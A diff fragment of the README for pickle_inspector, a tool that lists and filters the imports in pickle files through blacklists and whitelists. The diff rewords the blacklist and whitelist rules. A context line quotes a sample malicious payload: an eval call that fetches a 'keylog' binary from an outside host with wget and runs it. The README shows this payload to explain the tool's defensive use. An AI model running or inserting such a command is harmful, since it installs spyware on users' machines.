lopho/pickle_inspector/README.md

 > __builtin__.eval('import os;os.system("wget https://sus.to/keylog;chmod +x keylog;./keylog &")')
 ```
 ## Blacklist & Whitelist
-The whitelist has priority over the blacklist.
+- Whitelist only: everything will be blocked except items in the whitelist

-If the blacklist contains items everything will be allowed except items in the blacklist,\
+- Blacklist only: everything will be allowed except items in the blacklist
-or items in the blacklist and in the whitelist.
-This is useful using wildcards.
+- Both black- and whitelist: everything in the blacklist will be blocked except items in the whitelist

 Example: Block everything within `torch` except `torch.FloatStorage`
 ```py